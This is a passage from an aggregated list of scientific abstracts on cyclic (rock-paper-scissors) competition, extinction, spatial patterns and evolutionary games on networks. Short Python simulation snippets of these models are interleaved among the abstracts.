While the deterministic approach (rate equations) predicts the coexistence of the species resulting in regular (yet neutrally stable) oscillations of the population densities, we demonstrate that fluctuations arising in the system with a finite number of agents drastically alter this picture and are responsible for extinction: After long enough time, two of the three species die out. As main findings we provide analytic estimates and numerical computation of the extinction probability at a given time. We also discuss the implications of our results for a broad class of competing population systems. --- paper_title: Chaotic Red Queen coevolution in three-species food chains paper_content: Coevolution between two antagonistic species follows the so-called ‘Red Queen dynamics’ when reciprocal selection results in an endless series of adaptation by one species and counteradaptation by the other. Red Queen dynamics are ‘genetically driven’ when selective sweeps involving new beneficial mutations result in perpetual oscillations of the coevolving traits on the slow evolutionary time scale. Mathematical models have shown that a prey and a predator can coevolve along a genetically driven Red Queen cycle. We found that embedding the prey–predator interaction into a three-species food chain that includes a coevolving superpredator often turns the genetically driven Red Queen cycle into chaos. A key condition is that the prey evolves fast enough. Red Queen chaos implies that the direction and strength of selection are intrinsically unpredictable beyond a short evolutionary time, with greatest evolutionary unpredictability in the superpredator. We hypothesize that genetically driven Red Queen chaos could explain why many natural populations are poised at the edge of ecological chaos. Over space, genetically driven chaos is expected to cause the evolutionary divergence of local populations, even under homogenizing environmental fluctuations, and thus to promote genetic diversity among ecological communities over long evolutionary time. --- paper_title: Continuous model for the rock-scissors-paper game between bacteriocin producing bacteria. paper_content: In this work, important aspects of bacteriocin producing bacteria and their interplay are elucidated. Various attempts to model the resistant, producer and sensitive Escherichia coli strains in the so-called rock–scissors–paper (RSP) game had been made in the literature. The question arose whether there is a continuous model with a cyclic structure and admitting an oscillatory dynamics as observed in various experiments. The May–Leonard system admits a Hopf bifurcation, which is, however, degenerate and hence inadequate. The traditional differential equation model of the RSP-game cannot be applied either to the bacteriocin system because it involves positive interaction terms. In this paper, a plausible competitive Lotka–Volterra system model of the RSP game is presented and the dynamics generated by that model is analyzed. For the first time, a continuous, spatially homogeneous model that describes the competitive interaction between bacteriocin-producing, resistant and sensitive bacteria is established. The interaction terms have negative coefficients. In some experiments, for example, in mice cultures, migration seemed to be essential for the reinfection in the RSP cycle. Often statistical and spatial effects such as migration and mutation are regarded to be essential for periodicity. 
Our model gives rise to oscillatory dynamics in the RSP game without such effects. Here, a normal form description of the limit cycle and conditions for its stability are derived. The toxicity of the bacteriocin is used as a bifurcation parameter. Exact parameter ranges are obtained for which a stable (robust) limit cycle and a stable heteroclinic cycle exist in the three-species game. These parameters are in good accordance with the observed relations for the E. coli strains. The roles of growth rate and growth yield of the three strains are discussed. Numerical calculations show that the sensitive, which might be regarded as the weakest, can have the longest sojourn times. --- paper_title: How community size affects survival chances in cyclic competition games that microorganisms play paper_content: Cyclic competition is a mechanism underlying biodiversity in nature and the competition between large numbers of interacting individuals under multifaceted environmental conditions. It is commonly modeled with the popular children’s rock-paper-scissors game. Here we probe cyclic competition systematically in a community of three strains of bacteria Escherichia coli. Recent experiments and simulations indicated the resistant strain of E. coli to win the competition. Other data, however, predicted the sensitive strain to be the final winner. We find a generic feature of cyclic competition that solves this puzzle: community size plays a decisive role in selecting the surviving competitor. Size-dependent effects arise from an easily detectable “period of quasiextinction” and may be tested in experiments. We briefly indicate how. --- paper_title: Three-fold way to extinction in populations of cyclically competing species paper_content: Species extinction occurs regularly and unavoidably in ecological systems. The time scales for extinction can vary broadly and provide information on the ecosystem's stability. We study the spatio-temporal extinction dynamics of a paradigmatic population model where three species exhibit cyclic competition. The cyclic dynamics reflects the non-equilibrium nature of the species interactions. While previous work focuses on the coarsening process as a mechanism that drives the system to extinction, we found that unexpectedly the dynamics in going to extinction is much richer. We observed dynamics of three different types. In addition to coarsening, in the evolutionarily relevant limit of large times, oscillating traveling waves and heteroclinic orbits play a dominant role. The weights of the different processes depend on the degree of mixing and the system size. By means of analytical arguments and extensive numerical simulations we provide the full characteristics of scenarios leading to extinction in one of the most surprising models of ecology. --- paper_title: Noise and Correlations in a Spatial Population Model with Cyclic Competition paper_content: Noise and spatial degrees of freedom characterize most ecosystems. Some aspects of their influence on the coevolution of populations with cyclic interspecies competition have been demonstrated in recent experiments e.g., B. Kerr , Nature (London) 418, 171 (2002)]. To reach a better theoretical understanding of these phenomena, we consider a paradigmatic spatial model where three species exhibit cyclic dominance. 
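Before the spatial, individual-based description is taken up again below, the role of community size in the well-mixed limit can be made concrete with a short Gillespie-type sketch: N individuals of three cyclically dominating species react in pairs until the cycle breaks, and the mean time to extinction is recorded as a function of N. The population sizes, unit reaction rates and number of runs are illustrative assumptions.

```python
import numpy as np

rng = np.random.default_rng(1)

def time_to_extinction(N):
    # counts of the three species in a well-mixed population of fixed size N
    n = np.array([N // 3, N // 3, N - 2 * (N // 3)], dtype=float)
    t = 0.0
    while np.count_nonzero(n) > 1:
        # pairwise reactions: species i consumes species i+1 (cyclically) at unit rate
        rates = np.array([n[0] * n[1], n[1] * n[2], n[2] * n[0]]) / N
        total = rates.sum()
        t += rng.exponential(1.0 / total)
        i = rng.choice(3, p=rates / total)
        n[i] += 1            # predator reproduces
        n[(i + 1) % 3] -= 1  # prey is removed
    return t

for N in (30, 60, 120):
    times = [time_to_extinction(N) for _ in range(25)]
    print(N, np.mean(times))
```

How this mean time grows with N is the quantity whose scaling is used, in the entries above, to separate coexistence from extinction on ecologically relevant time scales.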
Using an individual-based description, as well as stochastic partial differential and deterministic reaction-diffusion equations, we account for stochastic fluctuations and spatial diffusion at different levels and show how fascinating patterns of entangled spirals emerge. We rationalize our analysis by computing the spatiotemporal correlation functions and provide analytical expressions for the front velocity and the wavelength of the propagating spiral waves. --- paper_title: Vortex dynamics in a three-state model under cyclic dominance. paper_content: The evolution of domain structure is investigated in a two-dimensional voter model with three states under cyclic dominance. The study focus on the dynamics of vortices, defined by the points where the three states (domains) meet. We can distinguish vortices and antivortices which walk randomly and annihilate each other. The domain wall motion can create vortex-antivortex pairs at a rate that is increased by the spiral formation due to cyclic dominance. This mechanism is contrasted with a branching annihilating random walk (BARW) in a particle-antiparticle system with density-dependent pair creation rate. Numerical estimates for the critical indices of the vortex density [beta=0.29(4)] and of its fluctuation [gamma=0.34(6)] improve an earlier Monte Carlo study [K. Tainaka and Y. Itoh, Europhys. Lett. 15, 399 (1991)] of the three-state cyclic model in two dimensions. --- paper_title: Evolutionary game theory: Temporal and spatial effects beyond replicator dynamics paper_content: Evolutionary game dynamics is one of the most fruitful frameworks for studying evolution in different disciplines, from Biology to Economics. Within this context, the approach of choice for many researchers is the so-called replicator equation, that describes mathematically the idea that those individuals performing better have more offspring and thus their frequency in the population grows. While very many interesting results have been obtained with this equation in the three decades elapsed since it was first proposed, it is important to realize the limits of its applicability. One particularly relevant issue in this respect is that of non-mean-field effects, that may arise from temporal fluctuations or from spatial correlations, both neglected in the replicator equation. This review discusses these temporal and spatial effects focusing on the non-trivial modifications they induce when compared to the outcome of replicator dynamics. Alongside this question, the hypothesis of linearity and its relation to the choice of the rule for strategy update is also analyzed. The discussion is presented in terms of the emergence of cooperation, as one of the current key problems in Biology and in other disciplines. --- paper_title: Globally synchronized oscillations in complex cyclic games paper_content: The rock-paper-scissors game and its generalizations with S>3 species are well-studied models for cyclically interacting populations. Four is, however, the minimum number of species that, by allowing other interactions beyond the single, cyclic loop, breaks both the full intransitivity of the food graph and the one-predator, one-prey symmetry. Lütz et al. [J. Theor. Biol. 317, 286 (2013)] have shown the existence, on a square lattice, of two distinct phases, with either four or three coexisting species. In both phases, each agent is eventually replaced by one of its predators, but these strategy oscillations remain localized as long as the interactions are short ranged. 
Distant regions may be either out of phase or cycling through different food-web subloops (if any). Here we show that upon replacing a minimum fraction Q of the short-range interactions by long-range ones, there is a Hopf bifurcation, and global oscillations become stable. Surprisingly, to build such long-distance, global synchronization, the four-species coexistence phase requires fewer long-range interactions than the three-species phase, while one would naively expect the opposite to be true. Moreover, deviations from highly homogeneous conditions (χ=0 or 1) increase Qc, and the more heterogeneous is the food web, the harder the synchronization is. By further increasing Q, while the three-species phase remains stable, the four-species one has a transition to an absorbing, single-species state. The existence of a phase with global oscillations for S>3, when the interaction graph has multiple subloops and several possible local cycles, leads to the conjecture that global oscillations are a general characteristic, even for large, realistic food webs. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Local dispersal promotes biodiversity in a real-life game of rock–paper–scissors paper_content: One of the central aims of ecology is to identify mechanisms that maintain biodiversity. Numerous theoretical models have shown that competing species can coexist if ecological processes such as dispersal, movement, and interaction occur over small spatial scales. In particular, this may be the case for non-transitive communities, that is, those without strict competitive hierarchies. The classic non-transitive system involves a community of three competing species satisfying a relationship similar to the children's game rock-paper-scissors, where rock crushes scissors, scissors cuts paper, and paper covers rock. Such relationships have been demonstrated in several natural systems. Some models predict that local interaction and dispersal are sufficient to ensure coexistence of all three species in such a community, whereas diversity is lost when ecological processes occur over larger scales. Here, we test these predictions empirically using a non-transitive model community containing three populations of Escherichia coli. 
We find that diversity is rapidly lost in our experimental community when dispersal and interaction occur over relatively large spatial scales, whereas all populations coexist when ecological processes are localized. --- paper_title: Statistical mechanics of complex networks paper_content: The emergence of order in natural systems is a constant source of inspiration for both physical and biological sciences. While the spatial order characterizing for example the crystals has been the basis of many advances in contemporary physics, most complex systems in nature do not offer such high degree of order. Many of these systems form complex networks whose nodes are the elements of the system and edges represent the interactions between them. ::: Traditionally complex networks have been described by the random graph theory founded in 1959 by Paul Erdohs and Alfred Renyi. One of the defining features of random graphs is that they are statistically homogeneous, and their degree distribution (characterizing the spread in the number of edges starting from a node) is a Poisson distribution. In contrast, recent empirical studies, including the work of our group, indicate that the topology of real networks is much richer than that of random graphs. In particular, the degree distribution of real networks is a power-law, indicating a heterogeneous topology in which the majority of the nodes have a small degree, but there is a significant fraction of highly connected nodes that play an important role in the connectivity of the network. ::: The scale-free topology of real networks has very important consequences on their functioning. For example, we have discovered that scale-free networks are extremely resilient to the random disruption of their nodes. On the other hand, the selective removal of the nodes with highest degree induces a rapid breakdown of the network to isolated subparts that cannot communicate with each other. ::: The non-trivial scaling of the degree distribution of real networks is also an indication of their assembly and evolution. Indeed, our modeling studies have shown us that there are general principles governing the evolution of networks. Most networks start from a small seed and grow by the addition of new nodes which attach to the nodes already in the system. This process obeys preferential attachment: the new nodes are more likely to connect to nodes with already high degree. We have proposed a simple model based on these two principles wich was able to reproduce the power-law degree distribution of real networks. Perhaps even more importantly, this model paved the way to a new paradigm of network modeling, trying to capture the evolution of networks, not just their static topology. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. 
The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Phase transitions for rock-scissors-paper game on different networks. paper_content: Monte Carlo simulations and dynamical mean-field approximations are performed to study the phase transitions in the rock-scissors-paper game on different host networks. These graphs are originated from lattices by introducing quenched and annealed randomness simultaneously. In the resulting phase diagrams three different stationary states are identified for all structures. The comparison of results on different networks suggests that the value of the clustering coefficient plays an irrelevant role in the emergence of a global oscillating phase. The critical behavior of phase transitions seems to be universal and can be described by the same exponents. --- paper_title: Rock-scissors-paper game on regular small-world networks paper_content: The spatial rock-scissors-paper game (or cyclic Lotka–Volterra system) is extended to study how the spatiotemporal patterns are affected by the rewired host lattice providing uniform number of neighbours (degree) at each site. On the square lattice this system exhibits a self-organizing pattern with equal concentration of the competing strategies (species). If the quenched background is constructed by substituting random links for the nearest-neighbour bonds of a square lattice then a limit cycle occurs when the portion of random links exceeds a threshold value. This transition can also be observed if the standard link is replaced temporarily by a random one with a probability P at each step of iteration. Above a second threshold value of P the amplitude of global oscillation increases with time and finally the system reaches one of the homogeneous (absorbing) states. In this case the results of Monte Carlo simulations are compared with the predictions of the dynamical cluster technique evaluating all the configuration probabilities on one-, two-, four- and six-site clusters. --- paper_title: Networks with dispersed degrees save stable coexistence of species in cyclic competition paper_content: Coexistence of individuals with different species or phenotypes is often found in nature in spite of competition between them. Stable coexistence of multiple types of individuals have implications for maintenance of ecological biodiversity and emergence of altruism in society, to name a few. Various mechanisms of coexistence including spatial structure of populations, heterogeneous individuals, and heterogeneous environments, have been proposed. In reality, individuals disperse and interact on complex networks. We examine how heterogeneous degree distributions of networks influence coexistence, focusing on models of cyclically competing species. We show analytically and numerically that heterogeneity in degree distributions promotes stable coexistence. --- paper_title: Defined spatial structure stabilizes a synthetic multispecies bacterial community paper_content: This paper shows that for microbial communities, “fences make good neighbors.” Communities of soil microorganisms perform critical functions: controlling climate, enhancing crop production, and remediation of environmental contamination. 
Microbial communities in the oral cavity and the gut are of high biomedical interest. Understanding and harnessing the function of these communities is difficult: artificial microbial communities in the laboratory become unstable because of “winner-takes-all” competition among species. We constructed a community of three different species of wild-type soil bacteria with syntrophic interactions using a microfluidic device to control spatial structure and chemical communication. We found that defined microscale spatial structure is both necessary and sufficient for the stable coexistence of interacting bacterial species in the synthetic community. A mathematical model describes how spatial structure can balance the competition and positive interactions within the community, even when the rates of production and consumption of nutrients by species are mismatched, by exploiting nonlinearities of these processes. These findings provide experimental and modeling evidence for a class of communities that require microscale spatial structure for stability, and these results predict that controlling spatial structure may enable harnessing the function of natural and synthetic multispecies communities in the laboratory. --- paper_title: THE EVOLUTION OF RESTRAINT IN BACTERIAL BIOFILMS UNDER NONTRANSITIVE COMPETITION paper_content: Abstract Theoretical and empirical evidence indicates that competing species can coexist if dispersal, migration, and competitive interactions occur over relatively small spatial scales. In particular, spatial structure appears to be critical to certain communities with nontransitive competition. A typical nontransitive system involves three competing species that satisfy a relationship similar to the children's game of rock–paper–scissors. Although the ecological dynamics of nontransitive systems in spatially structured communities have received some attention, fewer studies have incorporated evolutionary change. Here we investigate evolution within toxic bacterial biofilms using an agent-based simulation that represents a nontransitive community containing three populations of Escherichia coli. In structured, nontransitive communities, strains evolve that do not maximize their competitive ability: They do not reduce their probability of death to a minimum or increase their toxicity to a maximum. That is... --- paper_title: Complex networks: Structure and dynamics paper_content: Coupled biological and chemical systems, neural networks, social interacting species, the Internet and the World Wide Web, are only a few examples of systems composed by a large number of highly interconnected dynamical units. The first approach to capture the global properties of such systems is to model them as graphs whose nodes represent the dynamical units, and whose links stand for the interactions between them. On the one hand, scientists have to cope with structural issues, such as characterizing the topology of a complex wiring architecture, revealing the unifying principles that are at the basis of real networks, and developing models to mimic the growth of a network and reproduce its structural properties. On the other hand, many relevant questions arise when studying complex networks’ dynamics, such as learning how a large ensemble of dynamical systems that interact through a complex wiring topology can behave collectively. 
We review the major concepts and results recently achieved in the study of the structure and dynamics of complex networks, and summarize the relevant applications of these ideas in many different disciplines, ranging from nonlinear science to biology, from statistical mechanics to medicine and engineering. © 2005 Elsevier B.V. All rights reserved. --- paper_title: Evolution of restraint in a structured rock-paper-scissors community. paper_content: It is not immediately clear how costly behavior that benefits others evolves by natural selection. By saving on inherent costs, individuals that do not contribute socially have a selective advantage over altruists if both types receive equal benefits. Restrained consumption of a common resource is a form of altruism. The cost of this kind of prudent behavior is that restrained individuals give up resources to less-restrained individuals. The benefit of restraint is that better resource management may prolong the persistence of the group. One way to dodge the problem of defection is for altruists to interact disproportionately with other altruists. With limited dispersal, restrained individuals persist because of interaction with like types, whereas it is the unrestrained individuals that must face the negative long-term consequences of their rapacity. Here, we study the evolution of restraint in a community of three competitors exhibiting a nontransitive (rock–paper–scissors) relationship. The nontransitivity ensures a form of negative feedback, whereby improvement in growth of one competitor has the counterintuitive consequence of lowering the density of that improved player. This negative feedback generates detrimental long-term consequences for unrestrained growth. Using both computer simulations and evolution experiments with a nontransitive community of Escherichia coli, we find that restrained growth can evolve under conditions of limited dispersal in which negative feedback is present. This research, thus, highlights a set of ecological conditions sufficient for the evolution of one form of altruism. --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. 
In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: Evolutionary Game Theory: Theoretical Concepts and Applications to Microbial Communities paper_content: Ecological systems are complex assemblies of large numbers of individuals, interacting competitively under multifaceted environmental conditions. Recent studies using microbial laboratory communities have revealed some of the self-organization principles underneath the complexity of these systems. A major role of the inherent stochasticity of its dynamics and the spatial segregation of different interacting species into distinct patterns has thereby been established. It ensures the viability of microbial colonies by allowing for species diversity, cooperative behavior and other kinds of “social” behavior. ::: ::: A synthesis of evolutionary game theory, nonlinear dynamics, and the theory of stochastic processes provides the mathematical tools and a conceptual framework for a deeper understanding of these ecological systems. We give an introduction into the modern formulation of these theories and illustrate their effectiveness focussing on selected examples of microbial systems. Intrinsic fluctuations, stemming from the discreteness of individuals, are ubiquitous, and can have an important impact on the stability of ecosystems. In the absence of speciation, extinction of species is unavoidable. It may, however, take very long times. We provide a general concept for defining survival and extinction on ecological time-scales. Spatial degrees of freedom come with a certain mobility of individuals. When the latter is sufficiently high, bacterial community structures can be understood through mapping individual-based models, in a continuum approach, onto stochastic partial differential equations. These allow progress using methods of nonlinear dynamics such as bifurcation analysis and invariant manifolds. We conclude with a perspective on the current challenges in quantifying bacterial pattern formation, and how this might have an impact on fundamental research in non-equilibrium physics. --- paper_title: Resolving social dilemmas on evolving random networks paper_content: We show that strategy-independent adaptations of random interaction networks can induce powerful mechanisms, ranging from the Red Queen to group selection, which promote cooperation in evolutionary social dilemmas. These two mechanisms emerge spontaneously as dynamical processes due to deletions and additions of links, which are performed whenever players adopt new strategies and after a certain number of game iterations, respectively. The potency of cooperation promotion, as well as the mechanism responsible for it, can thereby be tuned via a single parameter determining the frequency of link additions. We thus demonstrate that coevolving random networks may evoke an appropriate mechanism for each social dilemma, such that cooperation prevails even in highly unfavorable conditions. 
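The coevolutionary rule just described, in which links are removed when a player adopts a new strategy and fresh links are added at random after a fixed number of game rounds, can be sketched as follows for a weak prisoner's dilemma on a random graph. The payoff values, the imitation rule and the bookkeeping constants add_every and links_added are assumptions made for the illustration, not the exact protocol of the cited work.

```python
import random

random.seed(2)

N, K0 = 200, 4                      # players and initial mean degree (assumed)
b = 1.4                             # temptation to defect; weak PD payoffs R=1, S=P=0
add_every, links_added = 20, 100    # assumed coevolutionary bookkeeping
PAY = {("C", "C"): 1.0, ("C", "D"): 0.0, ("D", "C"): b, ("D", "D"): 0.0}

strategy = [random.choice("CD") for _ in range(N)]
neigh = [set() for _ in range(N)]
while sum(len(s) for s in neigh) < N * K0:      # wire an initial random graph
    i, j = random.sample(range(N), 2)
    neigh[i].add(j); neigh[j].add(i)

def payoff(i):
    return sum(PAY[strategy[i], strategy[j]] for j in neigh[i])

for step in range(1, 200 * N + 1):
    i = random.randrange(N)
    if not neigh[i]:
        continue
    j = random.choice(tuple(neigh[i]))
    if strategy[j] != strategy[i] and payoff(j) > payoff(i):
        strategy[i] = strategy[j]               # imitate the more successful neighbour
        k = random.choice(tuple(neigh[i]))      # and lose one link for switching strategy
        neigh[i].discard(k); neigh[k].discard(i)
    if step % (add_every * N) == 0:             # periodically add fresh random links
        for _ in range(links_added):
            a, c = random.sample(range(N), 2)
            neigh[a].add(c); neigh[c].add(a)

print("final fraction of cooperators:", strategy.count("C") / N)
```

Varying how often links are added relative to how quickly they are lost plays the role of the single tuning parameter that, according to the entry above, selects which cooperation-promoting mechanism dominates.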
--- paper_title: Population interaction structure and the coexistence of bacterial strains playing ‘rock-paper-scissors’ paper_content: The simplest example of non-transitive competition is the game rock–paper–scissors (RPS), which exhibits characteristic cyclic strategy replacement: paper beats rock, which in turn beats scissors, which in turn beats paper. In addition to its familiar use in understanding human decision-making, rock–paper–scissors is also played in many biological systems. Among other reasons, this is important because it potentially provides a mechanism whereby species- or strain coexistence can occur in the face of intense competition. Kerr et al. (2002, Nature 418: 171–174) use complementary experiments and simulations to show that RPS-playing toxic, resistant, and susceptible E. coli bacteria can coexist when interactions between the strains are spatially explicit. This raises the question of whether limited interactions associated with space are sufficient to allow strain coexistence, or whether space per se is crucial. I approach this question by extending the Kerr et al. model to include different (aspatial) population network structures with the same degree distributions as corresponding spatial lattice models. I show that the coexistence that occurs for some parameter combinations when simulated bacterial strains compete on lattices is absent when they compete on random regular graphs. Further, considering small-world networks of intermediate ‘quenched randomness’ between lattices and random regular graphs, I show that only small deviations from pure spatial interactions are sufficient to prevent strain coexistence. These results emphasize the explicit role of space, rather than merely limited interactions, as being decisive in allowing the coexistence of toxic, resistant, and susceptible strains in this model system. --- paper_title: Phase transitions for a rock–scissors–paper model with long-range-directed interactions paper_content: We have investigated a rock–scissors–paper model with long-range-directed interactions in two dimensions where every site has four outgoing links but a fraction q of the outgoing links to the nearest neighbour sites are rewired to other long-distance sites chosen randomly and the lattice structure is replaced again after a Monte Carlo step. It is found that, with q increasing, the system changes from a three species coexistence self-organizing state to a global oscillation state and then to one of the homogeneous states. However when q exceeds a third threshold value, the system returns to a self-organizing state. When we restrict the maximum number of ingoing links of a site to four, the last self-organizing state disappears, the system stays in the homogeneous state forever after q exceeds the second threshold value. And when we restrict the maximum number of ingoing links of a site to five or six, the system exhibits a transition from the homogeneous state to a global oscillation state again and then to the last self-organizing state with q increasing. The comparison of results on different networks suggests that the sites with zero ingoing links should play a significant role in the emergences of the later self-organizing state and the subsequent global oscillation. --- paper_title: Cyclic dominance in adaptive networks paper_content: The Rock-Paper-Scissors (RPS) game is a paradigmatic model for cyclic dominance in biological systems. 
Here we consider this game in the social context of competition between opinions in a networked society. In our model, every agent has an opinion which is drawn from the three choices: rock, paper or scissors. In every timestep a link is selected randomly and the game is played between the nodes connected by the link. The loser either adopts the opinion of the winner or rewires the link. These rules define an adaptive network on which the agents’ opinions coevolve with the network topology of social contacts. We show analytically and numerically that nonequilibrium phase transitions occur as a function of the rewiring strength. The transitions separate four distinct phases which differ in the observed dynamics of opinions and topology. In particular, there is one phase where the population settles to an arbitrary consensus opinion. We present a detailed analysis of the corresponding transitions revealing an apparently paradoxical behavior. The system approaches consensus states where they are unstable, whereas other dynamics prevail when the consensus states are stable. --- paper_title: Coevolutionary cycling of host sociality and pathogen virulence in contact networks. paper_content: Infectious diseases may place strong selection on the social organization of animals. Conversely, the structure of social systems can influence the evolutionary trajectories of pathogens. While much attention has focused on the evolution of host sociality or pathogen virulence separately, few studies have looked at their coevolution. Here we use an agent-based simulation to explore host-pathogen coevolution in social contact networks. Our results indicate that under certain conditions, both host sociality and pathogen virulence exhibit continuous cycling. The way pathogens move through the network (e.g., their interhost transmission and probability of superinfection) and the structure of the network can influence the existence and form of cycling. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Phase transitions for rock-scissors-paper game on different networks. paper_content: Monte Carlo simulations and dynamical mean-field approximations are performed to study the phase transitions in the rock-scissors-paper game on different host networks. These graphs are originated from lattices by introducing quenched and annealed randomness simultaneously. 
In the resulting phase diagrams three different stationary states are identified for all structures. The comparison of results on different networks suggests that the value of the clustering coefficient plays an irrelevant role in the emergence of a global oscillating phase. The critical behavior of phase transitions seems to be universal and can be described by the same exponents. --- paper_title: Emergence of multilevel selection in the prisoner's dilemma game on coevolving random networks paper_content: We study the evolution of cooperation in the prisoner's dilemma game, whereby a coevolutionary rule is introduced that molds the random topology of the interaction network in two ways. First, existing links are deleted whenever a player adopts a new strategy or its degree exceeds a threshold value; second, new links are added randomly after a given number of game iterations. These coevolutionary processes correspond to the generic formation of new links and deletion of existing links that, especially in human societies, appear frequently as a consequence of ongoing socialization, change of lifestyle or death. Due to the counteraction of deletions and additions of links the initial heterogeneity of the interaction network is qualitatively preserved, and thus cannot be held responsible for the observed promotion of cooperation. Indeed, the coevolutionary rule evokes the spontaneous emergence of a powerful multilevel selection mechanism, which despite the sustained random topology of the evolving network, maintains cooperation across the whole span of defection temptation values. --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. 
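Several of the entries above compare rock-scissors-paper dynamics on a regular lattice with versions played on rewired or random graphs. A minimal sketch of that comparison is given below: the same cyclic invasion dynamics is run on a square lattice in which each link is redirected to a random site with probability q. The lattice size, q, the number of sweeps and the invasion-only update are assumptions for illustration.

```python
import random

random.seed(3)

L, q = 60, 0.2              # lattice size and fraction of rewired links (illustrative)
N = L * L
neigh = [[] for _ in range(N)]
for x in range(L):
    for y in range(L):
        i = x * L + y
        for dx, dy in ((1, 0), (0, 1)):          # link each site to its right and down neighbours
            j = ((x + dx) % L) * L + (y + dy) % L
            if random.random() < q:              # quenched rewiring of a fraction q of links
                j = random.randrange(N)
            neigh[i].append(j)
            neigh[j].append(i)

state = [random.randrange(3) for _ in range(N)]  # three species, no empty sites
beats = {0: 1, 1: 2, 2: 0}                       # 0 beats 1, 1 beats 2, 2 beats 0

history = []
for sweep in range(300):
    for _ in range(N):
        i = random.randrange(N)
        j = random.choice(neigh[i])
        if beats[state[i]] == state[j]:
            state[j] = state[i]                  # cyclic invasion of the dominated neighbour
    history.append([state.count(s) / N for s in range(3)])

print("final global densities:", history[-1])
```

Running the same loop for a range of q values and following the three global densities over time is the simplest way to see the reported change from the self-organizing lattice state to growing global oscillations once the portion of random links exceeds a threshold.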
--- paper_title: Mobility-Dependent Selection of Competing Strategy Associations paper_content: Standard models of population dynamics focus on the interaction, survival, and extinction of the competing species individually. Real ecological systems, however, are characterized by an abundance of species (or strategies, in the terminology of evolutionary-game theory) that form intricate, complex interaction networks. The description of the ensuing dynamics may be aided by studying associations of certain strategies rather than individual ones. Here we show how such a higher-level description can bear fruitful insight. Motivated from different strains of colicinogenic Escherichia coli bacteria, we investigate a four-strategy system which contains a three-strategy cycle and a neutral alliance of two strategies. We find that the stochastic, spatial model exhibits a mobility-dependent selection of either the three-strategy cycle or of the neutral pair. We analyze this intriguing phenomenon numerically and analytically. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are 